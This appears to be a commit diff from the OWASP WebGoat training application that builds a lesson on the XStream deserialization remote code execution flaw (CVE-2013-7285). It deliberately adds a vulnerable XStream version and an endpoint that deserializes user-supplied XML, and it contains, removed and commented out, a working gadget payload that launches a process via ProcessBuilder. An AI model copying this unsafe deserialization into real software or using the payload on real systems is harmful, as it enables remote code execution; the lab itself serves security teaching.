Xstream RCE works now

webgoat-container/pom.xml

@@ -259,6 +259,12 @@
             <artifactId>docker-maven-plugin</artifactId>
             <version>0.4.10</version>
         </dependency>
+        
+		<dependency>
+			<groupId>com.thoughtworks.xstream</groupId>
+			<artifactId>xstream</artifactId>
+			<version>1.4.6</version>
+		</dependency>
 
         <!-- ************* END spring MVC and related dependencies ************** -->
         <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/CatchAllConverter.java

@@ -0,0 +1,22 @@
+package org.owasp.webgoat.plugin;
+
+import com.thoughtworks.xstream.converters.Converter;
+import com.thoughtworks.xstream.converters.MarshallingContext;
+import com.thoughtworks.xstream.converters.UnmarshallingContext;
+import com.thoughtworks.xstream.io.HierarchicalStreamReader;
+import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
+
+public class CatchAllConverter implements Converter {
+
+    public boolean canConvert(Class clazz) {
+        return true;
+    }
+
+    public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
+    }
+
+    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+       return null;
+    }
+
+}

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/Contact.java

@@ -0,0 +1,18 @@
+package org.owasp.webgoat.plugin;
+
+import com.thoughtworks.xstream.annotations.XStreamAlias;
+
+@XStreamAlias("contact")
+public class Contact {
+    @XStreamAlias("name")
+    String name;
+
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+}

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/ContactConverter.java

@@ -0,0 +1,30 @@
+package org.owasp.webgoat.plugin;
+
+import com.thoughtworks.xstream.converters.Converter;
+import com.thoughtworks.xstream.converters.MarshallingContext;
+import com.thoughtworks.xstream.converters.UnmarshallingContext;
+import com.thoughtworks.xstream.io.HierarchicalStreamReader;
+import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
+
+public class ContactConverter implements Converter {
+
+    public boolean canConvert(Class clazz) {
+        return clazz.equals(Contact.class);
+    }
+
+    public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
+        Contact contact = (Contact) value;
+        writer.startNode("name");
+        writer.setValue(contact.getName());
+        writer.endNode();
+    }
+
+    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+        Contact contact = new Contact();
+        reader.moveDown();
+        contact.setName(reader.getValue());
+        reader.moveUp();
+        return contact;
+    }
+
+}

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/plugin/VulnerableComponentsLesson.java

@@ -1,6 +1,7 @@
 package org.owasp.webgoat.plugin;
 
-import com.thoughtworks.xstream.XStream;
+import java.io.IOException;
+
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
@@ -9,7 +10,8 @@ import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.io.IOException;
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.xml.DomDriver;
 
 /**
  * *************************************************************************************************
@@ -50,34 +52,50 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint {
 
 	@RequestMapping(method = RequestMethod.POST)
 	public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException {
-		String process = "open"; 		
+
-		String arguments = "/Applications/Calculator.app";		
 		
-		String payload2 = "<sorted-set>" +  
+        XStream xstream = new XStream(new DomDriver());
-						 "<string>foo</string>" +
+//        xstream.processAnnotations(Contact.class);
-						 "<dynamic-proxy>" + 
+//        xstream.registerConverter(new ContactConverter());
-						 "<interface>java.lang.Comparable</interface>" +
+//        xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
-						 "<handler class=\"java.beans.EventHandler\">" +
+ 
-						 "    <target class=\"java.lang.ProcessBuilder\">" +
+//        Contact c = new Contact();
-						 "         <command>" +
+//        c.setName("Alvaro");
-						 "             <string>" + process + "</string>" +
+//        String sc = xstream.toXML(c);
-						 "             <string>" + arguments + "</string>" +
+//        System.out.println(sc);
-						 "        </command>" +
+
-						 "    </target>" +
+
-						 "    <action>start</action>" +
+//        String payload2 = "<sorted-set>" +
-						 "</handler>" + 
+//                "<string>foo</string>" +
-						 "</dynamic-proxy>" + 						
+//                "<dynamic-proxy>" +
-						"</sorted-set>";
+//                "<interface>java.lang.Comparable</interface>" +
-		XStream xstream = new XStream();
+//                "<handler class=\"java.beans.EventHandler\">" +
-		String xml = (String)xstream.fromXML(payload2);
+//                " <target class=\"java.lang.ProcessBuilder\">" +
-       if (!payload.toString().equals("")) {
+//                " <command>" +
-            return trackProgress(success()
+//                " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
-                .feedback("vulnerable-components")
+//                " </command>" +
-                .feedbackArgs(xml)
+//                " </target>" +
-                .build());
+//                " <action>start</action>" +
-        } else {
+//                "</handler>" +
+//                "</dynamic-proxy>" +
+//                "</sorted-set>";
+
+        try {
+//        	System.out.println("Payload:" + payload);
+            Contact expl = (Contact) xstream.fromXML(payload);
+            return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build());
+
+        } catch (com.thoughtworks.xstream.converters.ConversionException ex) {
+        	ex.printStackTrace();
+        	if (ex.getMessage().contains("Integer"))
+        	{
+                return trackProgress(success().feedback("vulnerable-components.success").build());
+        	}
             return trackProgress(failed().feedback("vulnerable-components.close").build());
-        }
+
+       }
+
+ 
 
 	}
 }

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/html/VulnerableComponents.html

@@ -131,6 +131,12 @@
 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
 		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div>
+	</div>
+	<div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div>
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 			<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -142,9 +148,14 @@
 				enctype="application/json;charset=UTF-8">
 				<div id="lessonContent">
 					<form accept-charset="UNKNOWN" method="POST" name="form"
-						action="#attack/307/100" enctype="">
+						action="#attack/307/100" enctype="">					
-						Enter Your XML payload: <input name="payload" value="" type="TEXT"/><input
+						<table>
-							name="SUBMIT" value="Go!" type="SUBMIT"/>
+							<tr>
+								<td>Enter the contact's xml representation:</td>
+								<td><textarea name="payload" value="" type="TEXT" rows="15" cols="60"/></td>
+								<td><input name="SUBMIT" value="Go!" type="SUBMIT"/></td>
+							</tr>
+						</table>
 					</form>
 				</div>
 			</form>

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content4c.adoc

@@ -4,18 +4,17 @@
 
 * Is it old or is it stable
 * Was my lack of upgrade a deliberate choice or a lack of knowledge
-
-=== What is architectural risk?
-
-* Is my component out of date
 * Is the project I'm using no longer active
 * Is my component unpopular
 
+=== Summary
 
-=== Summary?
+* It's really difficult to keep components up to dat
-image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]
+ 
 
 For the components analyzed in 25,000 applications it was found that:
 
 *  8% of  2 year old components did not have a newer version
 * 23% of 11 year old components did not have a newer version
+
+image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content5.adoc

@@ -6,8 +6,8 @@ In November of 2015, the Apache Commons Collections component latest release was
 Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit]
 
 
-=== Dinis Cruz exploit of XStream
+=== Dinis Cruz and pwntester exploit of XStream
-XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] 
+XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] https://github.com/pwntester/XStreamPOC[pwntester/XStreamPOC]  
 
-Let's see if you can figure out how to exploit this in WebGoat.
+You may want to read the article(s) before trying this lesson.  Let's see if you can figure out how to exploit this in WebGoat.
 

webgoat-lessons/vulnerable-components/src/main/resources/plugin/VulnerableComponents/lessonPlans/en/VulnerableComponents_content5a.adoc

@@ -0,0 +1,14 @@
+== Exploiting http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285[CVE-2013-7285] (XStream)
+
+WebGoat Sends an XML document to add contacts to a contacts database.  
+[source,xml]
+----
+<contact>  
+    <id>1</id>
+    <firstName>Bruce</firstName>
+    <lastName>Mayhew</lastName>
+    <email>webgoat@owasp.org</email>
+</contact>  
+----
+
+For this example, we will let you enter the xml directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using XStream.fromXML(xml).

webgoat-lessons/vulnerable-components/src/main/resources/plugin/i18n/WebGoatLabels.properties

@@ -1,3 +1,6 @@
 vulnerable-components.title=Vulnerable Components
 EnterYourName=Enter your Name
 Go!=Go!
+vulnerable-components.close=Trying to deserialize null object.
+vulnerable-components.success=If you are not seeing the application you started; it may be minimized
+vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution.